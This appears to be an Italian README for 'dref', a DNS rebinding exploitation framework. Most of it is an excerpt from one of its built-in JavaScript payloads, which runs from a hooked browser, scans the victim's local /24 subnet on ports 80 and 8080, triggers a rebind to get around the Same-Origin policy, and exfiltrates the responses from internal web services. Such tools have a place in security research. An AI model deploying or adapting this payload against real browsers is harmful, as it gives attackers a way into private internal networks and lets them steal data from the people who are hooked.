
Framework di sfruttamento DNS Rebinding
Framework di sfruttamento del DNS Rebinding
Questo progetto non è più mantenuto.
dref si occupa del lavoro pesante per il DNS rebinding. Il seguente estratto da uno dei suoi payload integrati mostra il framework utilizzato per scansionare una sottorete locale da un browser agganciato; dopo aver identificato i servizi web attivi, procede all'esfiltrazione delle risposte GET, superando agevolmente la policy Same-Origin:
// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)
// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}
// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}
Recati alla Wiki per iniziare oppure dai un'occhiata a dref che attacca browser headless per un caso d'uso pratico.
Questa è una versione di sviluppo - non utilizzare in produzione